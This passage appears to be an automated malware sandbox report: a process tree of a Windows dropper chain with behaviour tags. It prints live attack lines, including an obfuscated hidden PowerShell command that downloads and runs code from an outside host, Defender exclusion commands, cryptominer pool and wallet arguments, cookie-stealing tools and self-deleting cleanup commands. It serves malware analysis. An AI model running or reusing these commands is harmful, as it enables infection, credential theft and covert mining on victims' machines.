        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:7920
        
        C:\Users\Admin\AppData\Local\Temp\3umv4erngcw\rzd0ry3yrp5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3umv4erngcw\rzd0ry3yrp5.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\is-1IJL1.tmp\rzd0ry3yrp5.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1IJL1.tmp\rzd0ry3yrp5.tmp" /SL5="$201EE,2592217,780800,C:\Users\Admin\AppData\Local\Temp\3umv4erngcw\rzd0ry3yrp5.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\is-PLHKB.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-PLHKB.tmp\winlthsth.exe"
        10⤵
        
        PID:416
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 720
        11⤵
        Program crash
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\zaxdr5ymv33\132spuhvrqb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zaxdr5ymv33\132spuhvrqb.exe" /ustwo INSTALL
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "132spuhvrqb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zaxdr5ymv33\132spuhvrqb.exe" & exit
        9⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "132spuhvrqb.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\45xqbx2mr5s\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\45xqbx2mr5s\vpn.exe" /silent /subid=482
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\is-GI4MN.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GI4MN.tmp\vpn.tmp" /SL5="$70068,15170975,270336,C:\Users\Admin\AppData\Local\Temp\45xqbx2mr5s\vpn.exe" /silent /subid=482
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:5820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:1336
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:6820
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:6376
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:7232
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:8404
        
        C:\Users\Admin\AppData\Local\Temp\viko3jhinsp\vjp2nptcneo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\viko3jhinsp\vjp2nptcneo.exe" /quiet SILENT=1 AF=756
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:5724
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\viko3jhinsp\vjp2nptcneo.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\viko3jhinsp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616440370 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:3956
        
        C:\Users\Admin\AppData\Local\Temp\lk2lanixmqz\mlhic33ojjr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lk2lanixmqz\mlhic33ojjr.exe" /1-610
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Rough-Sky'
        9⤵
        
        PID:6004
        
        C:\Program Files (x86)\Rough-Sky\7za.exe
        
        "C:\Program Files (x86)\Rough-Sky\7za.exe" e -p154.61.71.13 winamp.7z
        9⤵
        
        PID:5744
        
        C:\Program Files (x86)\Rough-Sky\mlhic33ojjr.exe
        
        "C:\Program Files (x86)\Rough-Sky\mlhic33ojjr.exe" /1-610
        9⤵
        
        PID:6600
        
        C:\Users\Admin\AppData\Local\Temp\i5c50o0ltdm\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\i5c50o0ltdm\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\wtzrenbfrmt\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wtzrenbfrmt\Setup3310.exe" /Verysilent /subid=577
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\p0d0dj44ck3\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\p0d0dj44ck3\app.exe" /8-23
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Empty-Dew"
        9⤵
        
        PID:4068
        
        C:\Program Files (x86)\Empty-Dew\7za.exe
        
        "C:\Program Files (x86)\Empty-Dew\7za.exe" e -p154.61.71.13 winamp-plugins.7z
        9⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Empty-Dew\app.exe" -map "C:\Program Files (x86)\Empty-Dew\WinmonProcessMonitor.sys""
        9⤵
        
        PID:7128
        
        C:\Program Files (x86)\Empty-Dew\app.exe
        
        "C:\Program Files (x86)\Empty-Dew\app.exe" -map "C:\Program Files (x86)\Empty-Dew\WinmonProcessMonitor.sys"
        10⤵
        
        PID:4540
        
        C:\Program Files (x86)\Empty-Dew\7za.exe
        
        "C:\Program Files (x86)\Empty-Dew\7za.exe" e -p154.61.71.13 winamp.7z
        9⤵
        
        PID:4196
        
        C:\Program Files (x86)\Empty-Dew\app.exe
        
        "C:\Program Files (x86)\Empty-Dew\app.exe" /8-23
        9⤵
        
        PID:4560
    - - C:\Users\Admin\AppData\Local\Temp\GI9J6WWVFX\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GI9J6WWVFX\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3804
      - C:\Users\Admin\AppData\Local\Temp\is-655PN.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-655PN.tmp\setups.tmp" /SL5="$80032,383902,148480,C:\Users\Admin\AppData\Local\Temp\GI9J6WWVFX\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3964
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:800
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4164
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4256
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of AdjustPrivilegeToken
      PID:4820
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      Executes dropped EXE
      PID:5208
    - - C:\Users\Admin\AppData\Roaming\1F12.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\1F12.tmp.exe"
        5⤵
        
        PID:4632
      - C:\Users\Admin\AppData\Roaming\1F12.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\1F12.tmp.exe"
        6⤵
        
        PID:5528
    - - C:\Users\Admin\AppData\Roaming\28D7.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\28D7.tmp.exe"
        5⤵
        
        PID:5584
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\28D7.tmp.exe"
        6⤵
        
        PID:1044
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        7⤵
        Delays execution with timeout.exe
        
        PID:4388
    - - C:\Users\Admin\AppData\Local\Temp\f0488bfc..exe
        
        "C:\Users\Admin\AppData\Local\Temp\f0488bfc..exe"
        5⤵
        
        PID:4252
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:2248
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:4672
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:5796
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:5696
    - - C:\ProgramData\63685.exe
        
        "C:\ProgramData\63685.exe"
        5⤵
        
        PID:6448
    - - C:\ProgramData\7773786.exe
        
        "C:\ProgramData\7773786.exe"
        5⤵
        
        PID:6528
    - - C:\ProgramData\3860389.exe
        
        "C:\ProgramData\3860389.exe"
        5⤵
        
        PID:5700
    - - C:\ProgramData\7470228.exe
        
        "C:\ProgramData\7470228.exe"
        5⤵
        
        PID:6876
    - - C:\ProgramData\3144743.exe
        
        "C:\ProgramData\3144743.exe"
        5⤵
        
        PID:5800
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:6696
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5708
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:6944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4176

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4280

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4576

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4768

C:\Users\Admin\AppData\Local\Temp\is-GG7UR.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GG7UR.tmp\Setup3310.tmp" /SL5="$D02E8,138429,56832,C:\Users\Admin\AppData\Local\Temp\wtzrenbfrmt\Setup3310.exe" /Verysilent /subid=577
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5372
- C:\Users\Admin\AppData\Local\Temp\is-UD1QF.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-UD1QF.tmp\Setup.exe" /Verysilent
  2⤵
  PID:4924
- - C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"
    3⤵
    PID:2172
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
      4⤵
      PID:5732
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b edge
        5⤵
        
        PID:6208
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b chrome
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4628
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b firefox
        5⤵
        
        PID:6040
- - C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"
    3⤵
    PID:852
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:5012
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4880
- - C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"
    3⤵
    PID:5300
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:6764
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im RunWW.exe /f
        5⤵
        Kills process with taskkill
        
        PID:7040
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:4588
- - C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"
    3⤵
    PID:2788
- - C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe
    "C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"
    3⤵
    PID:2480
  - - C:\Users\Admin\AppData\Local\Temp\is-87IHM.tmp\LabPicV3.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-87IHM.tmp\LabPicV3.tmp" /SL5="$204D6,239334,155648,C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"
      4⤵
      PID:4456
    - - C:\Users\Admin\AppData\Local\Temp\is-FNUBU.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-FNUBU.tmp\ppppppfy.exe" /S /UID=lab214
        5⤵
        
        PID:5320
      - C:\Program Files\Windows Portable Devices\STSQDASPHI\prolab.exe
        
        "C:\Program Files\Windows Portable Devices\STSQDASPHI\prolab.exe" /VERYSILENT
        6⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\is-FCKRB.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FCKRB.tmp\prolab.tmp" /SL5="$30378,575243,216576,C:\Program Files\Windows Portable Devices\STSQDASPHI\prolab.exe" /VERYSILENT
        7⤵
        
        PID:5636
      - C:\Users\Admin\AppData\Local\Temp\62-2b631-bfb-849bd-4c6fda2208efc\Suxoguduco.exe
        
        "C:\Users\Admin\AppData\Local\Temp\62-2b631-bfb-849bd-4c6fda2208efc\Suxoguduco.exe"
        6⤵
        
        PID:6340
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p0lpjfor.yyn\gaooo.exe & exit
        7⤵
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\p0lpjfor.yyn\gaooo.exe
        
        C:\Users\Admin\AppData\Local\Temp\p0lpjfor.yyn\gaooo.exe
        8⤵
        
        PID:7520
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        9⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        9⤵
        
        PID:4928
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h3urkjqj.jsz\md7_7dfj.exe & exit
        7⤵
        
        PID:8848
        
        C:\Users\Admin\AppData\Local\Temp\h3urkjqj.jsz\md7_7dfj.exe
        
        C:\Users\Admin\AppData\Local\Temp\h3urkjqj.jsz\md7_7dfj.exe
        8⤵
        
        PID:8748
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nfocurcw.eta\customer6.exe & exit
        7⤵
        
        PID:8808
        
        C:\Users\Admin\AppData\Local\Temp\nfocurcw.eta\customer6.exe
        
        C:\Users\Admin\AppData\Local\Temp\nfocurcw.eta\customer6.exe
        8⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
        9⤵
        
        PID:6140
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ueryto0.2rz\askinstall31.exe & exit
        7⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\2ueryto0.2rz\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\2ueryto0.2rz\askinstall31.exe
        8⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:4460
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mslv4lkn.lfx\HookSetp.exe & exit
        7⤵
        
        PID:7280
        
        C:\Users\Admin\AppData\Local\Temp\mslv4lkn.lfx\HookSetp.exe
        
        C:\Users\Admin\AppData\Local\Temp\mslv4lkn.lfx\HookSetp.exe
        8⤵
        
        PID:3936
        
        C:\ProgramData\6235487.exe
        
        "C:\ProgramData\6235487.exe"
        9⤵
        
        PID:7808
        
        C:\ProgramData\2950041.exe
        
        "C:\ProgramData\2950041.exe"
        9⤵
        
        PID:8260
        
        C:\ProgramData\8973219.exe
        
        "C:\ProgramData\8973219.exe"
        9⤵
        
        PID:9112
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x00hdhpw.bxb\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:4656
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2wsxatim.xal\19.exe & exit
        7⤵
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\2wsxatim.xal\19.exe
        
        C:\Users\Admin\AppData\Local\Temp\2wsxatim.xal\19.exe
        8⤵
        
        PID:8656
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javc\install.dll",install
        9⤵
        
        PID:6376
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wqjm0x3b.5p2\b9706c20.exe & exit
        7⤵
        
        PID:8080
        
        C:\Users\Admin\AppData\Local\Temp\wqjm0x3b.5p2\b9706c20.exe
        
        C:\Users\Admin\AppData\Local\Temp\wqjm0x3b.5p2\b9706c20.exe
        8⤵
        
        PID:8756
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8756 -s 480
        9⤵
        Program crash
        
        PID:7212
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hh0nkj0j.stf\setup.exe /8-2222 & exit
        7⤵
        
        PID:8412
        
        C:\Users\Admin\AppData\Local\Temp\hh0nkj0j.stf\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\hh0nkj0j.stf\setup.exe /8-2222
        8⤵
        
        PID:8916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Little-Shadow"
        9⤵
        
        PID:3816
        
        C:\Program Files (x86)\Little-Shadow\7za.exe
        
        "C:\Program Files (x86)\Little-Shadow\7za.exe" e -p154.61.71.13 winamp-plugins.7z
        9⤵
        
        PID:8792
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Little-Shadow\setup.exe" -map "C:\Program Files (x86)\Little-Shadow\WinmonProcessMonitor.sys""
        9⤵
        
        PID:6284
        
        C:\Program Files (x86)\Little-Shadow\setup.exe
        
        "C:\Program Files (x86)\Little-Shadow\setup.exe" -map "C:\Program Files (x86)\Little-Shadow\WinmonProcessMonitor.sys"
        10⤵
        
        PID:6884
        
        C:\Program Files (x86)\Little-Shadow\7za.exe
        
        "C:\Program Files (x86)\Little-Shadow\7za.exe" e -p154.61.71.13 winamp.7z
        9⤵
        
        PID:6412
        
        C:\Program Files (x86)\Little-Shadow\setup.exe
        
        "C:\Program Files (x86)\Little-Shadow\setup.exe" /8-2222
        9⤵
        
        PID:8544
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\44xaq0yl.dm1\file.exe & exit
        7⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\44xaq0yl.dm1\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\44xaq0yl.dm1\file.exe
        8⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        9⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\HN4NTWQD8P\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HN4NTWQD8P\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\HN4NTWQD8P\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HN4NTWQD8P\multitimer.exe" 1 3.1616696690.605cd5721ec3f 101
        11⤵
        
        PID:7932
        
        C:\Users\Admin\AppData\Local\Temp\HN4NTWQD8P\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HN4NTWQD8P\multitimer.exe" 2 3.1616696690.605cd5721ec3f
        12⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\dg3abqidxvk\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dg3abqidxvk\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:7552
        
        C:\Users\Admin\AppData\Local\Temp\is-L1GRF.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-L1GRF.tmp\vict.tmp" /SL5="$30512,870426,780800,C:\Users\Admin\AppData\Local\Temp\dg3abqidxvk\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:7584
        
        C:\Users\Admin\AppData\Local\Temp\to3kb2toi0h\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\to3kb2toi0h\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:5880
        
        C:\Users\Admin\AppData\Local\Temp\is-UO187.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UO187.tmp\Setup3310.tmp" /SL5="$205D4,138429,56832,C:\Users\Admin\AppData\Local\Temp\to3kb2toi0h\Setup3310.exe" /Verysilent /subid=577
        14⤵
        
        PID:8096
        
        C:\Users\Admin\AppData\Local\Temp\j3da2sx5put\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\j3da2sx5put\AwesomePoolU1.exe"
        13⤵
        
        PID:3888
        
        C:\Users\Admin\AppData\Local\Temp\61Y5RFSLCB\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\61Y5RFSLCB\setups.exe" ll
        10⤵
        
        PID:7488
        
        C:\Users\Admin\AppData\Local\Temp\is-EIFJO.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EIFJO.tmp\setups.tmp" /SL5="$5035E,383902,148480,C:\Users\Admin\AppData\Local\Temp\61Y5RFSLCB\setups.exe" ll
        11⤵
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        9⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        9⤵
        
        PID:8396
        
        C:\Users\Admin\AppData\Roaming\840D.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\840D.tmp.exe"
        10⤵
        
        PID:7668
        
        C:\Users\Admin\AppData\Roaming\840D.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\840D.tmp.exe"
        11⤵
        
        PID:7364
        
        C:\Users\Admin\AppData\Roaming\AF25.tmp.exe
